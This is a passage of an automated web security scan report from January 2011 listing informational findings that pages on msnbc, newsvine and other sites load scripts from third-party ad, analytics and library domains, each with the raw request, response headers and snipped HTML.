</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.517. http://www.msnbc.redacted/id/41329947/ns/us_news-crime_and_courts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41329947/ns/us_news-crime_and_courts/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41329947/ns/us_news-crime_and_courts/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 61260


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia3.redacted/j/ap/missing boy--241634326_v2.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.518. http://www.msnbc.redacted/id/41330515/ns/us_news-life/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41330515/ns/us_news-life/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41330515/ns/us_news-life/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 67355


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia4.redacted/j/ap/nannies park free-902595433_v2.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.519. http://www.msnbc.redacted/id/41330876/ns/world_news-europe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41330876/ns/world_news-europe/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41330876/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 56613


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/site_wide_print.css" />

<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.520. http://www.msnbc.redacted/id/8004316/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/8004316/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/8004316/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sun, 30 Jan 2011 01:57:20 GMT
Date: Sun, 30 Jan 2011 01:57:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 165221

<html><head><title>Top Videos - Videos &amp; Clips of Top News Stories &amp; Headlines - msnbc.com- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="styleshe
...[SNIP]...
<link rel="apple-touch-icon" href="http://msnbcmedia.redacted/i/msnbc/Components/ArtAndPhoto-Fronts/SITEWIDE/apple-touch-icon.png"/><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
</h6><script src="http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F" type="text/javascript"></script>
...[SNIP]...

23.521. http://www.myhomeredacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myhomeredacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.myhomeredacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 24 Nov 2010 18:39:14 GMT
Accept-Ranges: bytes
ETag: "c26075e468ccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:59:09 GMT
Connection: close
Content-Length: 19444

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
   Copyright 1996-2010 Adobe, Inc. All Rights Reserved
   More info available at http://www.omniture.com -->
   <script language="JavaScript" type="text/javascript" src="http://myhomemsn.vo.msecnd.net/js/s_code.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://cetrk.com/pages/scripts/0009/2911.js"> </script>
...[SNIP]...

23.522. http://www.nasawatch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nasawatch.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.nasawatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:12:31 GMT
Server: Apache/1.3.41 (Darwin) mod_ssl/2.8.31 OpenSSL/0.9.7l PHP/4.4.9 mod_perl/1.29
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 03:13:31 GMT
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html
Content-Length: 96832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="six
...[SNIP]...
<div align="center">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

23.523. http://www.neudesicmediagroup.com/Advertising.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neudesicmediagroup.com
Path:   /Advertising.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Advertising.aspx HTTP/1.1
Host: www.neudesicmediagroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:23:55 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Cache-Control: private
Set-Cookie: ASP.NET_SessionId=s0mx4g5y2r2vfvtxg2am1zig; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 11092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Contact Us |
...[SNIP]...
content="online advertising, microsoft advertising, internet advertising, web advertising, advertising network, buy advertising, sell advertising, internet ads, media solutions for publishers" />

   <script type="text/javascript" src="http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.min.js?v=3"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s18.sitemeter.com/js/counter.js?site=s18neumedia"></script>
...[SNIP]...

23.524. http://www.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:13:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:13:58 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: sprout=2_cd9e4WPi9S8TA65nc4FRmISDbfld%2Bz1WpHy7rW3XmiijWVlFj9YKULk5rqZPYHTNzk9GF6CO7%2BXYkzPwgSOo13YhzbUSSyLOwO%2B6vGq3ySXmjD3Eg7P%2BQKpYWNqjYOuPuseiwN7bnR0vLsw97nbakOqq0wOdY0LAfFr8pXvFQl%2FEpbRgscYoYMKCLzqOimQzpLcu%2BPb3ZHvuf5qssV1%2Fch3eCPGUjyRGW%2BsBRftbD%2B1ztBgY4jcQ9ZW4CmzltUsM; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com
Set-Cookie: vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 55258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.525. http://www.newsvine.com/_tools/user/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_tools/user/login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_tools/user/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:58:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3670341b4e7c29240de918b35bcfb885; expires=Sat, 25-Jan-2031 01:58:04 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 17589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...

23.526. https://www.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.newsvine.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; jt_time=1296399959031; vid=d22bc33559f8a0701e021885c03ad2c9; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:02:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:02:03 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Keep-Alive: timeout=3, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 56108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.527. https://www.newsvine.com/_nv/accounts/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_nv/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:58:45 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=f8216a56010cce7056bb2bebc2b8ea2f; expires=Sat, 25-Jan-2031 01:58:45 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.528. https://www.newsvine.com/_nv/accounts/msnbc/newsletters

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/msnbc/newsletters

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_nv/accounts/msnbc/newsletters HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:00 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=612c76b17edbcde9ea20fe784e8a625d; expires=Sat, 25-Jan-2031 01:23:00 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js"></script>
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://www.msnbc.redacted/default.ashx/id/36009898#msnbc.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.529. https://www.newsvine.com/_nv/accounts/register

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/register

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_nv/accounts/register HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:53 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=209e83103b98465a328a2c9ac4b644ca; expires=Sat, 25-Jan-2031 01:22:53 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 11769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js"></script>
